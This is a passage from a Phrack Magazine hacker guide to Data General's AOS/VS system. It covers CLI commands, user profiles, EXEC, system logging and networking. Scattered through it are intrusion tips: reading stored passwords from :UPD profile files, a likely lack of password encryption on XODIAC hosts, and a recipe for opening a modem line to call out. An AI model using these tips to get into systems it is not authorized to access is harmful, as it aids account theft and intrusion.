WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP b PROC/DEF/IOC/IN=?USER.TMP/BLOCK PREDITOR DEL ?USER.TMP [!END] [!END] [!END] SYSTEM SECURITY ~~~~~~~~~~~~~~ The AOS/VS login is performed in the following manner. Every username has a file associated with it in the :UPD directory. That file is its profile, and contains the account profile. Once the user has entered a correct username/password pair, the operating system loads the user's profile (which includes how much memory and disk space the user is allowed to use and the user's allowed privileges) into its internal tables. Several privileges which can be set are the initial user directory and initial program that will be executed upon completion of the login (eg, the CLI); how many processes the user may run; what process priorities the user has; and what SUPER privileges the user has (eg, SUPERUSER, SUPERPROCESS). As mentioned, if the user has SUPER privileges, he must activate them himself (using the right command, or PRIVILEGE if using CLI32). An important thing to know about password security is that if the system is running Data General's XODIAC networking software, user's might not be able to access remote machines through the network if the passwords are encrypted. Therefore, if you are on a XODIAC host, chances are the passwords won't be encrypted. The ACL of the :UPD directory doesn't let every user can access it, though. Passwords are changed by the user by pressing Ctrl-L immediately after entering the password at login. This will only work for users that have the privilege to set their own passwords. Legal passwords are 6 to 15 characters. This the format (the fields) of the AOS/VS profiles: * Password * Initial program To be executed after login * Initial IPC file The LOGON file * Initial directory * Default user priority The user's process priority * Maximum queue priority The highest queue priority which the user can set for a batch job. The lower the number, the higher the priority (1-255). * Unlimited son processes * Maximum son processes If the above option if off. * Disk quota in blocks * Logical address space Allows the user to control the size of the (batch) logical address space in which his programs will be executed. If -1, the system sets. * Minimum working set The minimum number of pages a user can have in (batch) their active processes. If -1, the system determines the value according to the program's demands. * Maximum working set (batch) * Logical address space (non batch) * Minimum working set (non batch) * Maximum working set (non batch) * Encrypt password * Superuser * Superprocess * Use IPC Allows the user to make IPC calls. * Use console * Use batch * Use virtual console Virtual consoles are created by networked logins. * Use modem A modem is a console with the characteristic of /MOD on. * Change password * Change priority * Change type * Change username Allows user to become another username without actually logging in into that user's profile. * Access devices Allows user to directly issue Assembly instructions to devices. * Create without block Allows the user to start a son process without blocking the father process. * System manager privileges * Access local devices remotely * Change addr. space type Allows 32 bit processes to be called from 16 bit processes (usually on, since there is a CLI16, but most programs are 32 bit). * Change working set limit Allows user to change the working set size of programs. * Comments User profiles can be created, deleted, read, and modified from the AOS/VS User Profile Editor: PREDITOR. PREDITOR gives you a prompt from which you can read any account and the values of its fields. PREDITOR does not, however, display the password field, whether it's encrypted or not -- just an indication of what the Encrypt Password field is set to. This is easily overcome, since if you can execute the PREDITOR, you can just as well SED the :UPD:USERNAME file and look at the password (it's right up there) -- PREDITOR can only be loaded by a user that can become Superuser. Legal commands for the PREDITOR are Create, Delete, Edit, List, Question, Rename, and Use. They can all be abbreviated to their first letter. When CREATE is called, it first asks if you want to set the password, and depending on the answer asks you to enter a password. It then queries about the other fields, giving you three options (usually): YES, NO, and NL, the system's default. DELETE just asks for a confirmation on deleting the user, and also his home directory. EDIT is just like CREATE, allowing you to modify any field in the user's profile (including the password). LIST lists the status of every field in the profile (by using a template profile, such as '+', one could view every user on the system). QUESTION sets the system defaults, which will later be used by CREATE and EDIT. RENAME allows you to rename a user to another name, and USE changes the value in the !DEFAULT variable (your username). Logins are handled by a program called EXEC (that's what the EXEC-32 x.xx.xx.xx part in the login message means). EXEC just reads the username/password and if correct, logs the user in. After EXEC has been completed, the Initial Program from the profile is run. The commands for logins are CONTROL @EXEC DISABLE and ENABLE. See "The 'EXEC' Program" for more information about EXEC. When using ENABLE, the console receives login capabilities; apart from actually logging in, EXEC will also display :UTIL:LOGON.BANNER.SCREEN. ENABLE ------ /ALL Gives all the consoles the said capabilities. /TRIES=x Sets maximum login tries to x. /STOP This will have the same result as if an operator issued CONTROL @EXEC DISABLE after the maximum login tries was exceeded. /CONTINUE Lock console for 10 seconds and then continue. /FORCE Change the other parameters while the console is enabled. SYSTEM COMMANDS ~~~~~~~~~~~~~~ Every command has its own switches. However, all commands accept the /1, /2, /L and /Q switches (and /STR=string and /ESTR=string under /CLI32). /1=ERROR|ABORT|IGNORE|WARNING /2=WARNING|ERROR|ABORT|IGNORE Controls what the program will do under a class 1 or 2 error. The first option listed is the default. ERROR displays "Error: something" and stops command execution. ABORT aborts the command. IGNORE ignores the error, and WARNING displays "Warning: something" and continues with the command. /L=path The command will store all its output in 'path'. /Q Display output in columns with on space separating them (an exception to this switch is TYPE). /STR=string /ESTR=string The command will store its output in the 'string' string variable, which can be viewed later using the STRING command. If there is no output or the command is TYPE or COPY the string is set to null. /ESTR is for error output, /STR is for regular output. Some important AOS/VS commands are listed next. I included information about the DUMP and LOAD commands for information purposes only; as they require diskettes, I don't think you'll use them daily. However, I didn't go into diskette handling, etc in detail. Sorted alphabetically: ACL ---------- ACL is a utility to control the ACL (Access Control List). An ACL is just what is sounds like: it includes a list of usernames and what kind of access they have to the file. ACL used one-letter access code, as follows. LETTER TYPE/FILE TYPE/DIR -----------+---------------------------------+------------------------ A(ppend) Append to a file. Create files in the directory or move files into it. E(xecute) Execute the program. Allows access to the directory (changing into it, reading, etc). O(wner) Allows the user to change the ACL or erase the file/dir. R(ead) Read a file. List the files in the directory. W(rite) Write to a file. Create, delete or change ACLs of files in the directory. The default ACL for any file is OWARE for the user. ACL shows the ACL. To modify the ACL: ACL [user,access] [...] Access being one of the OWARE group, for example: ACL PHRACK43 HBT,OWARE (There is NO space between 'username' and 'access'!) ACL PHRACK42 HBT,OWARE +,R (In this example, the '+' template was used, '+' standing for all the users. This means that HBT has full access to the file, while the rest of the users can only read it. If templates are used, they should be used last, with specific usernames before them.) Under CLI32 group access is also available in the format of: ACL [user:group,access] [...] Switches: /[BEFORE|AFTER]/[TCR|TLA|TLM]=date and/or time /TYPE=type These function just like the same switches in FILESTATUS. /D Use the default settings (OWARE). Defaults may be changed using DEFCAL. /K Delete ACL - no one but a superuser will be able to access the file. /V Show each file changed. BROWSE ------ BROWSE is a program to browse (view, search, scroll in any direction) through any number of ASCII or binary files. While in BROWSE help is available by using 'H' or '?'. BROWSE starts at the end of file and lets you move backward (but you can change this). No further details are included since BROWSE can run only on CRT terminals (the actual terminals the employees usually sit at), and I didn't have the pleasure of using one of these (nor do I think will the information be of any use). CHARACTERISTICS --------------- CHARACTERISTICS displays or sets the characteristics of a device attached to a terminal (not a printer, for example). To change characteristics of a device permanently and not just for the current CLI level, you must be PID 2 (local console) or have SYSTEMMANAGER privilege on. To this, you must use EXEC first to DISABLE the device, use CHARACTERISTICS, and then use EXEC to ENABLE the device (see the section titled "The 'EXEC' Program"). The CHARACTERISTICS switch will be /DEFAULT/[default device characteristics] device. "device" for example, is @CON100. CHARACTERISTICS switches look like this: CHARACTERISTICS /[ON|OFF]/SWITCH. It's self explanatory. /8BT Interpret all 8 bits of an ASCII char as data. (For use with 8 bit character sets, of course.) /16B For Asian language translation. /4010I Device is a DG model 4010I terminal. /6012 Device is a DG model 6012 terminal. /605X Device is a DG DASHER model 6052, 6053, D210 or D211 terminal. /6130 Device is a DG DASHER model 6130, D410 or D460 terminal. /ACC Line requires modem access control (only users with the Use Modem privilege may login). /AUTOBAUD The system will automatically determine the terminal's baud (it's bps, damnit!) rate. /BAUD=b Sets a device's bps rate to b. b can be 45.5, 50, 75, 110, 134.5, 150, 300, 600, 1200, 1800, 2400, 3600, 4800, 7200, 9600, 19200, 38400. /BREAK=[BMOB|CAOB|CBOB|CFOB|DCOB] How the system will respond to a BREAK: BMOB (default) Clears binary mode and restore normal character handling CAOB Issues Ctrl-C Ctrl-A CBOB Issues Ctrl-C Ctrl-B CFOB Issues Ctrl-C Ctrl-F DCOB Disconnect user /CALLOUT Allow host initiated calls (outside calls). /CHARLEN=[5|6|7|8] Character length in bits, *including* stop bit. /CONTYPE=connection type Connection types are: BITMAPPED Windowing terminal DIRECT Standard connection PAD From PAD hardware PBX From a PBX controller PCVT From a DG/PC*i controller TERMSERVER From terminal server hardware TELNET Through telnet VIRTUAL Through a virtual terminal /CPL=[8-255] The maximum number of characters per line. /CTD Disconnect line if the user doesn't respond to login after a while. /DEFAULT Displays the default characteristics of the terminal. /DKHW If OFF, and /16B and /8BT are on, enable support for Chinese characters. /EB0 Specify the echoing of control characters. /EB1 When both off, nothing is echoed. When EB0 is on and EB1 is off, echos ^char. When EB0 is off, and EB1 is on, echos exactly what was entered. /EOL Don't output a newline if the number of characters in input has exceeded the line length. /ESC Interpret an escape as a Ctrl-C Ctrl-A interrupt. /FF Output a formfeed when the device opens. /G1G0 Enables the G1G0 character set (Taiwanese characters). /16B and /8BT must also be ON. /HARDCOPY Device is a printing terminal. /HDPX Provide half duplex support for a modem line. /HIFC Use CTS/RTS input flow control, cannot be on if /HDPX or /MOD are on. /HOFC Use CTS/RTS output flow control. /IFC Enables XON/XOFF to control terminal input (the Ctrl-S/Ctrl-Q control characters). /LEVEL=x Sets characteristics to the same as those in CLI level #x. /LPP=[4-255] The number of lines per page. /MDUA Allows direct access to the modem on the line (/MOD must also be set). You can then use ?WRITE to send commands to the modem. See the section titled "CLI Macro Programming". /MOD Use modem interface on this line. /MRI Monitor line for rings. /NAS Device is non ANSI standard. /NLX Enable Asian natural language translation. /16B and /8BT must also be ON. /NRM Suppress messages (from SEND) not sent from PID 2 (something like "mesg n" in Unix). /OFC XON/XOFF output flow control. /OTT Convert characters sequence "~}" to an escape (use with VT100 emulation, or how will you escape). /P Sets the characteristics to be the same as those used on the previous CLI level. /PARITY=[ODD|EVEN|NONE] Default is NONE. /PM Enable page mode, which pauses output every LPP lines (as set with the /LPP switch, default is 24). Ctrl-Q resumes. /RESET Reset characteristics to the default value. /RTSCD Check carrier detect before processing RTS signals. /HDPX must be ON. /SFF Simulate formfeeds. /SMCD Ignore carrier detect on modem lines. /MOD and must be ON, and this must be set if /HPDX is ON. /ST Simulate a tab every 8 columns. /STOPBITS=[1|1.5|2] /TCC=[time to wait for a carrier detect signal after the modem connect] Default is 40000 ms. /TCD=[time to wait for a carrier detect signal to return after it drops] Default is 5000 ms. /TDW=[delay between modem connect and the first I/O] Default is 2000 ms. /THC=[the amount of time after disconnecting for the modem to settle] Default is 10000 ms. /TLT=[time to wait between sending the last char and dropping RTS] Default is 0 ms. /HPDX must be ON. /TO Enable timeouts. /UCO Convert lowercase input to uppercase when displaying it. /ULC Accept both uppercase and lowercase as input. /WRP Wrap on a long line. /XLT Enable VT100 terminal emulation. Knowledge is knowledge, but AT&T is something different. Here is how you'd open a modem line for calling out: (You must be SYSTEMMANAGER) CLEARDEVICE/RXON @CON999 CONTROL @EXEC DISABLE @CON999 CHARACTERISTICS/ON/MOD/MDUA/CTD/CALLOUT @CON999 CONTROL @EXEC ENABLE @CON999 ((And here's how you put it back)) CLEARDEVICE/RXON @CON999 CONTROL @EXEC DISABLE @CON999 CHARACTERISTICS/DEF @CON999 CONTROL @EXEC ENABLE @CON999 CLEARDEVICE -------------------- You must be PID 2 (local console) or have SYSTEMMANAGER privileges turned on to use CLEARDEVICE on a terminal that isn't yours. must be a terminal line (eg, @CON100). /RXON Simulates a XON character from the device. /SBREAK Sends a break character to the device. ==Phrack Magazine== Volume Four, Issue Forty-Four, File 15 of 27 ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()() A Guide to Data General Corporation's AOS/VS System PART II by Herd Beast CONINFO [console] ----------------- CONINFO shows information about a console to the user. Without an argument, it gives the user information about his console. With a parameter, and if the user has SYSTEMMANAGER privilege turned on, it gives information about the console specified as argument. The information gives changes depending as to how the console is connected: CONNECTION INFORMATION ------------------------+--------------------------------- ITC/LTC over TCP/IP Device code, engine number, line number, IP address, port number. ITC/LTC over XNS Device code, engine number, line number, CS/200 ethernet address. ((No remote address if no connection exists (on both of them).)) ITC/PVC Device code, engine number, engine address, line number, line address OR an ASCII string if the PVC type is NAME. Telnet Line number, IP address, port. Only line number if there's no current connection. IACs Device code, engine number, line number, modem flag. Duarts Device code, engine number, line number, CON0 flag. TTI/TTO Opcon Device code, engine number, line number, CON0 flag. CREATE ----------------- CREATE creates a file (TXT or UDF). CREATE/LINK creates file links. /DATASENSITIVE Creates a file with a data sensitive record format. /DIRECTORY Creates a directory. /DYNAMIC Creates a file with a dynamic record format. /ELEMENTSIZE=x Sets the minimum amount of space by which a file can grow in 512 byte blocks. /FIXED=x Creates a file with a fixed length record format, with a length of x. /HASHFRAMESIZE=x Sets the unit into which the system divides the directory for file access to x. The default is 7. The best formula for this is: the nearest prime number (up to 157, the maximum) of the number of files / 20. /I Inserts typed text at @INPUT as the contents of the file. The input ends when a single ')' followed by a Return is typed. /INDEXLEVELS=x Sets the maximum number of data elements the file can hold to x. /LINK Creates a linked file to the second argument. For example, to link MODEM.CLI with :UTIL:NET:MODEM.CLI, use CREATE/LINK MODEM.CLI :UTIL:NET:MODEM.CLI. /M Takes the contents of the file from a macro that follows. The input ends when a single ')' followed by a Return is typed. /MAXSIZE=x Creates a control point directory of x*512 bytes (a disk block). /TYPE=t Creates a file of type t. Where t is either the right decimal number or the right 3 letter mnemonic (see the section titled "System Structure"). /VARIABLE Creates a file with variable record formats. DELETE ------------- Deletes file. The opposite of CREATE. DUMP [path] ------------------ DUMP dumps file from the current directory to a file. Such files can be a diskette or a magnetic tape. [path] is the template for the files to dump -- if it doesn't exist, everything will be dumped. DUMP isn't compatible with Unix; AOS/VS has a TAR command for dumping file for use in Unix. /[AFTER|BEFORE]/[TLA|TLM|TCR]=date and/or time /TYPE=[\]type These switches works just like the one in FILESTATUS. /BUFFERSIZE=x Sets the buffer to x (x is a multiply of 1024). x is given in bytes, but if specified as xK it reads a kilobytes (1 kilobyte is 1024 bytes). The larger the buffer, the more data fits on the tape. /DENSITY=[800|1600|6250|ADM|LOW|MEDIUM|HIGH] The numbers are for bits per inch. ADM means Automatic Density Matching. If one of the other values is used, there's a possibility that it won't fit in another tape unit (unit X's LOW value isn't the same as unit Y's). /FLAT Eliminates the directory structure. Otherwise, DUMP keeps the directory tree when dumping. /IBM Writes to a tape that an IBM format label, created using LABEL/I. /L[=pathname] Lists filenames dumped in pathname, or in @LIST. (See the command after LOAD, 'LISTFILE'). /NACL Don't dump ACLs, so that when reloading, the default ACL will be created. /RETAIN=x Sets the retention period. The dumpfile cannot be overwritten until x days have passed. /SEQUENTIAL Will not rewind the tape after completing the dump. /V Verify the dump by listing the dumped files. FED --- FED (moohaha), is a program, not a CLI command. FED stands for File Editor Utility, and it lets you examine locations in disk files and modify them. FED is run as XEQ FED [path]. The FED inner prompt is '_'. FED has internal keywords. They are run by using ESC (if you can't use escape, try setting CHAR/ON/XLT/OTT and use "~}"). To understand FED well, you must be familiar with the DEBUG command and some Assembly, which seems to me is beyond the scope of this file. So if you do know what you're doing, look DEBUG up. C Run a CLI under FED. DIS Change display mode G Examine/modify ring register H Help I Define/list temporary symbols J Delete temporary symbols M Examine/modify input radix MEM Examine/modify file locations S Search disk locations T Examine/modify display mode X Enable/disable symbol table Y Enable/disable logging to a file Z Exit FED ? Display verbose error messages /I=file Use the commands in filename for the editing session. /L=file Save all FED commands/responses to file. /S=file Use file as the symbol table file. /N Don't use a symbol table file. /P Treat the disk file as a program file. /R Open for read-only. /U Treat the disk data as a user data file. /X Treat the disk file as an OS file. LOAD [path] ------------------ LOAD restores files that were dumped. If LOAD is invoked from CLI32, a macro calls the DUMP_II program, which is a more advanced version of DUMP. If [path] is omitted, the entire dumpfile is loaded into the current directory (with its directory tree). /[AFTER|BEFORE]/[TLA|TLM|TCR]=date and/or time /TYPE=[\]type These switches function the same as in FILESTATUS. /BUFFERSIZE=x /DENSITY=density was already set with DUMP, use ADM if at all /FLAT /IBM /L[=path] /NACL /SEQUENTIAL /V These switches function the same as in DUMP, only in the reverse direction (for example, /NACL won't load the dumpfile's ACL and create new default -- username,OWARE -- ACLs. /DELETE Delete any existing file with matching name. /N Don't load, just list files in dumpfile. /Q Squeeze console messages and file lists (don't use tabs and more than one space). LISTFILE [path] --------------- LISTFILE sets the @LIST file (see the section titled "System Structure" for details). In short, program uses the generic file name @LIST, it will use the files specified through LISTFILE instead. /G Sets the LISTFILE to the generic @LIST. /K Sets the LISTFILE to null. /LEVEL=x Sets the LISTFILE to that of level number x LISTFILE. /P Sets the LISTFILE to the previous environment setting. PASSWORD -------- Only exists with CLI32. (For more information, see the section titled "System Structure"). /CHANGE Change the current CLI password. /PROMPT /NOPROMPT If /PROMPT, the user will have to enter his password when using LOCK (so he can't LOCK the console without a password). Otherwise, automatically locks the console when LOCK is executed. /READ=path /WRITE=path /WRITE Encrypts the CLI password and writes it to the file [path]. When /READ is issued, the encrypted password is read from the file. When a password check needs to be done, the password entered is encrypted and the encrypted forms are compared. This way, a "PASSWORD/READ=PWD" in the LOGON file can set the CLI password automatically at logon. I am not sure of the way that the password in encrypted when being saved with /WRITE. Nor, for that matter, do I have any more information about the way the login passwords are encrypted in the profiles (when and if they are). Beware of situation where PWD, for example, has the string "qwerty" in it, and you type PASSWORD/READ=qwerty. If you use LOCK, the terminal is locked forever, since "qwerty" is assumed to be the encrypted form. PROCESS -------------- Creates a son process to run the program in . is assumed to end with .PR, and only then to be just . /ACCESSDEVICES Allows the process to define and access I/O devices. Requires the Access Devices privilege as defined in the profile. /BLOCK Blocks the father CLI until the process terminates. If the CLI isn't blocked, you can use CHECKTERMS to display the process' termination message when it terminates. /BREAK Creates a break file (.BRK) if the process has an error or terminates because of one. If EXEC is TERMINATEd instead of HALTed using the HALT 'EXEC' command, it will create a .BRK file. /BSON Blocks the son process until freed with UNBLOCK. /CHLOGICALTYPE Allows the process to change its logical type (16 bit or 32 bit). Requires the Change Logical Type privilege, which, as mentioned in "System Security" is usually on. /CHPRIORITY Allows the process to change its priority. Requires Change Priority privilege. /CHTYPE Allows the process to create any other type of process and change its own process type. Requires Change Type privilege. /CHUSERNAME Allows the process to create a new process with a different username than its own. Requires Change Username privilege. /CHWSS Allows the process to change its working set size. Requires Change Working Setsize privilege. /CONSOLE[=console] Makes the new process' console the same as that of the father's console, or [console]. /CPU=x Limits CPU time for x seconds. /DACL Don't pass default ACL to the son process. /DATA[=path] Make the son's @DATA file the same as the father's, or [path]. /DEBUG Starts the son process in the debugger. /DEFAULT Gives the son process the same privileges as the father's. /DIRECTORY=path Make path the initial directory for the son process. /DUMP Appends a dump to the breakfile data. /INPUT[=path] Makes the son's @INPUT file the same as the father's, or [path]. /IOC Makes the son's @INPUT, @OUTPUT AND @CONSOLE the same as does of the father. /LIST=[path] Makes the son's @LIST file the same as the father's, or [path]. /MEMORY=x Sets the son's process maximum memory size in 2kb pages. /NAME=name Assign name to the son process. Now it can accessed both by PID and by name. /OUTPUT=path Makes the son's @OUTPUT file to be path. /PRIORITY=x Gives the process a priority of 1-511 (highest-lowest). /PREEMTIBLE /RESIDENT Makes the son process pre-emtible or resident. The default is swappable. /SONS[=x] Allows the son to create one less son process than the father, or x. /STRING Stores the termination message in the CLI string. /SUPERPROCESS /SUPERUSER Allows the son process to enter the appropriate SUPER mode. /UNLIMITEDSONS Allows the son process to create unlimited amount of sons. SED [path] ---------- SED is a program and not a CLI command and therefore run as XEQ SED ... [path] is the file to be edited. The SED inner prompt is '*'. SED is a text editor for creating and modifying files. SED's help facility is accessible by typing HELP from SED: ESCAPES ADD TEXT CHANGE TEXT DELETE TEXT LISTINGS POSITIONING ------- -------- ----------- ----------- -------- ----------- EXECUTE APPEND MODIFY DELETE LIST POSITION HELP INSERT REPLACE MOVE VIEW FIND SAVE DUPLICATE SUBSTITUTE JOIN PRINT UNDO SPLIT CUT PASTE EXITING MISC HELP WORDS ------- ---- ----------------------- ABANDON CLEAR CURSOR_CONTROL ADDRESS BYE DIRECTORY RANGE SOURCE CLI DISPLAY SEARCH_STRING DESTINATION DO SET KEYS SYNTAX SPELL SWITCHES SED's line editing keys are: Ctrl-A Move to end of line. Ctrl-B Move to end of last word. Ctrl-E Toggle insert mode. Ctrl-F Move to start of next word. Ctrl-H Move to beginning of line. Ctrl-I A tab. Ctrl-K Erase everything right of cursor (like in EMACS). Ctrl-X Move on character to the right. Ctrl-Y Move on character to the left. Ctrl-U Delete entire line. The commands are mostly self explanatory, but the format is something like this. Suppose you want to modify line #12, you'd write MODIFY 12, which will put you on line 12. Use the control keys to move about and edit the line, then press Return! If you don't press return but just escape back to the SED prompt, your changes will be lost! The same goes for most commands, if you need help, just type HELP COMMAND from the SED '*' prompt. /ED=dir Finds the SED .ED files in dir. /NO_ED Don't use .ED files. /NO_FORM_FEEDS Strip form feeds from the file. /NO_RECREATE Don't reset the date of the file after changing it. /NO_SCREEN Don't update the console automatically. /PROFILE=path path is the SED startup file, that contains legal SED commands. /WORK=dir Use this directory for SED temporary files. SEND -------------------- Sends sends to a user, based on the user's PID. Users' PIDs are displayed when typing WHOS. For example, SEND 2 FU I'M A HACKER. STRING [arg] ------------ Without an argument, STRING displays the contents of the CLI's string. Displayed strings have commas inserted in them instead of spaces. If an argument is present, the string is set to it. /K Set string to null. /P Set string to the the string in the previous environment (each CLI level can have a different string). SYSLOG [log file name] ---------------------- SYSLOG handles system logging activity; therefore, SYSLOG can only be run with PID 2 (the master console) or with SYSTEMMANAGER privileges turned on. "System logging" logs user information (processor usage, I/O usage) in :SYSLOG. System logging can be ran under several levels of detail, so that it may or may not record everything going on (like file accesses). "Superuser logging" are things caused by a superuser who will only be logged under the maximum detailed level; therefore, it's possible to log them separately, and not record everything else everybody else does. "Error logging", which logs power failures, hard errors and such is always on and goes to :ERROR_LOG. Finally, there's "CON0 logging", which logs all activities on the master console, in such a way, that if you view the CON0 log from CON0, the log will never end... /CON0/[START|STOP] [filename] Start or stop CON0 logging. The older CON0 log will be renamed into [filename], and a new log will be opened. Otherwise, the old log is appended to. /DETAIL=[FULL|MINIMAL] Sets (or changes) the level of detail when logging. The default is MINIMAL; FULL is mostly for security matters. /NOSOFTTAPEERRORS /SOFTTAPEERRORS Don't (or do) record soft tape errors. /RENAMEERROR Rename :ERROR_LOG to something else, and keep on logging to a new file. /START [filename] /STOP Start (or stop) logging to :SYSLOG. If [filename] is given, rename :SYSLOG to it and keep on logging to a new file. /SUPERUSER/[START|STOP] Start (or stop) Superuser logging. System logging must already be running. /VERBOSE Give a detailed status. Here's a system you wouldn't want to be on: SmSu) SYSLOG/START BEFORE_WE_WERE_HACKED SmSu) SYSLOG/DETAIL=FULL SmSu) SYSLOG/CON0=START WHO [hostname:] --------------- WHO shows information about processes. Without arguments, it shows your processes' information. If WHOS is issued, information on all the processes is displayed. The output from WHO is similar to this: Elapsed 109:21:22, CPU 0:00:35.828, I/O Blocks 0, Page Secs 22186 PID: 1 PMGR PMGR :PMGR.PR >From left to right, WHO displayed the process ID; username; console; and program pathname. WRITE [arg] ----------- Displays [arg], by default to @OUTPUT. [arg] can also be a pseudo macro such as [!USERNAME]. /FILEID=file Write [arg] to the file specified in file. /FORCE Forces the system to write immediately instead of periodically writing the files. /NONEWLINE Don't include the newline in the output. XEQ ---------- XEQ is identical to EXECUTE; it executes the program in path (how QT). The path should be to a file with a PR (PRogram) suffix, although it doesn't have to include .PR. /I Takes input from @INPUT, eg from the user. To end the input, type ')' and Return. /M Takes input from a macro that follow. The input end the same way as with /I. /S Stores the termination message in a STRING instead of the terminal screen (@OUTPUT). THE 'EXEC' PROGRAM ~~~~~~~~~~~~~~~~~ EXEC does more than just log users on. EXEC is the program that handles the AOS/VS multiuser environment. If handles user logins, but also batch, print, and networking queues, printers, and tape mount requests. To use any EXEC command, you must either have the username of the EXEC user (usually OP) or have SYSTEMMANAGER privileges on. Alternatively, if you have the right ACL (if you're the owner) of the device you're executing an EXEC command on, it will also work. EXEC commands are issued in this manner: CONTROL @EXEC COMMAND. EXEC has its own help facility, called XHELP, which gives help only on EXEC commands. These are the EXEC commands (alphabetically, once again): ACCESS CREATE HOLD PREMOUNT STOP ALIGN DEFAULTFORMS LIMIT PRIORITY TERMINATE ALLOCATE DELETE LOGGING PROMPTS TRAILERS BATCH_LIST DISABLE LPP PURGE UNHOLD BATCH_OUTPUT DISMOUNTED MAPPER QPRIORITY UNITSTATUS BINARY ELONGATE MDUMP REFUSED UNLIMIT BRIEF ENABLE MESSAGE RELEASE UNSILENCE CANCEL EVEN MODIFY RESTART VERBOSE CLOSE FLUSH MOUNTSTATUS SILENCE CONSOLESTATUS FORMS OPEN SPOOLSTATUS CONTINUE HALT OPERATOR START CPL HEADERS PAUSE STATUS ACCESS Change the ACL of files in the :PER directory. If some has OWNER access to a device or queue, he can issue an EXEC CONTROL command to it. If he had READ or WRITE access to a queue, he can display it or add jobs to it, accordingly. The default ACL is +,RW (READ/WRITE access for all users). The :PER directory contains devices (such as consoles, printers, etc) and queue jobs. ALIGN Tells the printer handler to stop printing (giving the operator a chance to align the paper). ALLOCATE Restore a tape unit to EXEC's list of mountable tape unit (will show on UNITSTATUS). BATCH_LIST Change the print queue to which a batch's listings go. BATCH_OUTPUT Change the print queue to which a batch's output go. BINARY Tells the printer handler to set or disable BINARY mode. When in binary mode, passes everything sent to the printer as-is. When binary mode is off, the printing handler catches characters and changes them so they'll have a meaning on the device. Binary mode is necessary when using a graphics printer, for example. BRIEF Opposite of VERBOSE. CANCEL Cancels a waiting queue entry. CLOSE Prevents a queue from accepting more requests. CONSOLESTATUS Displays the status of an EXEC-handled EXEC. Displays the console's name, maximum number of login tries allowed, the PID, and which user is logged on (if at all). CONTINUE Continue a device after changes (for example, running START) have been made to it. CPL Changes the number of characters per page for a device. CREATE Create a queue. DEFAULTFORMS Where the default formatting specs are. DELETE Delete a queue. DISABLE The opposite of ENABLE. DISMOUNTED Dismount a tape mounted with CONTROL @EXEC MOUNT. ELONGATE Turns elongated printing on a DASHER LP2 printer on or off. When printing in elongated printing, the characters are wide. ENABLE For more information, see the section titled "System Security". EVEN Sets the status of pagination on a printer. When on, all files are printed as if they have an even number of pages, for cosmetic reasons (all header pages come on the same fold of paper [yes, it sounds disgusting]). FLUSH Terminate the currently running job on a device or queue. FORMS Use the formatting specs in a filename for a certain printer. HALT Terminate EXEC. HEADERS Change number of headers printed when printing (default is 1). HOLD Suspends a batch or printer queue until UNHOLD is issued. LIMIT Enforces limits on CPU processor time or number of printed pages on devices or queues. LOGGING Where to send error and status messages instead of CON0, the system console. LPP Sets the number of lines per page when printing. MAPPER Tells the printing handler to use character mapping as defined in a given filename. MDUMP Suspend all other EXEC activities to create a memory dump in the :UTIL directory. MESSAGE Append a message to EXEC's log. MODIFY Modifies the parameters of an inactive queue entry. MOUNTSTATUS Displays the status of all user mount requests. OPEN Opens a queue to receive user requests. OPERATOR Whether or not there's an operator available to help with diskette dumps (remember what the OPERATOR privilege is used for; not everyone has it). PAUSE Suspends processing of a queue or on a device. PREMOUNT Mount a labeled tape volume even before a user request it be mount (and thus the operator doesn't get prompted when users try to mount it; they immediately get access). PRIORITY Changes the priority and/or process type for batches or printing processes. PROMPTS Whether EXEC will display the time after each command. PURGE Delete all inactive entries in a queue. QPRIORITY Limit a batch or device to only job with a certain queue priority (or in a range of priorities). REFUSED Refuse a MOUNT request. RELEASE Remove a tape unit from the list of mountable unit (it won't be displayed with CONTROL @EXEC UNITSTATUS. RESTART Restart a job, and if printer job, can specify from which page until which page to print. SILENCE Suppresses EXEC messages about a device or a batch. SPOOLSTATUS Give device and queue information. If no devices or queuenames are given, it reports each spooled device and the queue associated with it, CPL, LPP, headers, trailers, binary mode status, form specifications, priority and process type. START Make a connection between a queue and a device. Jobs for the queue will be run on the device. This is need for something like printing queues. STATUS Describes the status of devices or batches. It reports the sequence number, queue priority, user, and PID. For a printer, it also reports the number of pages left and number of copies left. STOP Dissociate a queue from a device. TERMINATE Terminate the user process on a console (disconnects user). TRAILERS Changed number of trailers printed when printing (default is 0). UNHOLD Release from HOLD. UNITSTATUS Displays mount status of a tape unit or all units if no devicename is specified. UNLIMIT Release from LIMIT. UNSILENCE Release from SILENCE. VERBOSE Give detailed messages. Brief messages include the queue's name, sequence number and user. Verbose messages also include the PID and pathname. Messages are sent when a device or a batch processes a request. NETWORKING ~~~~~~~~~ AOS/VS is compatible with several networking protocols. The most widely known and used are X.25 and TCP/IP. There is also Data General's XODIAC network, as well as PCI networks and many others. In general, network services are run as process by the NETOP username (usually "OP"), and have programs for the users to execute. The NETOP process handles communications and report generating to the other networking processes. It has similar restrictions to that of the EXEC process (one must have its username to control it, and so on). Before going into specifics, there are some general details about networks. Almost everything having to do with networking -- from hosts, to help files and programs, will be found in the :NET directory. Programs and macros will be in :NET:UTIL, and so on. The :PER directory, which contains devices, contains devices for the networking processes. TCP/IP: The AOS/VS implementation of TCP/IP incorporates the usual TCP/IP programs: rlogin, rsh, telnet, ftp, smtp and so on. Because of the way most of these programs were built (with strong relationships to Unix), AOS/VS work in a similar way. AOS/VS runs RSHD, for remote logging in, and supports individual .RHOST files as well as HOSTS.EQUIV files; TELNETD, for telnet sessions; FTPD, for ftp sessions; SNMPD, for network management; and SMTP, which is the same as activating the AOS/VS SENDMAIL with the become daemon switch, for receiving mail. There are also programs for remote printing and dumping of files on tapes, as well as NSLOOKUP and NETSTAT. In the :ETC directory, there will be some general TCP/IP files, and in :USR:LIB there will be spool directories for mail and printing services. The files normally found in :ETC will usually match the format and function of their counterparts on Unix (for example, :ETC:HOSTS = /etc/hosts, and so on). However, some explaining is necessary. The file :ETC:PASSWD does not contain any passwords. It exists for the use of the SENDMAIL program, for looking up local users on the machine. Thus if someone sends mail to a local user, mail will be sent only if that user has an entry in :ETC:PASSWD. An example file would be, op::0:::/udd/op: mail::8:::/usr/spool/mqueue: :ETC:SNMPD.TRAP_COMMUNITIES contains a list of hosts, ports, and communities that the SNMPD process will send traps to (a SNMP trap is a message sent indicating a change of state). :USR:LIB contains mail programs, such as SENDMAIL's aliases file, the SENDMAIL program itself, the SENDMAIL.CF (configuration file) and so on. :USR:SPOOL contains spool 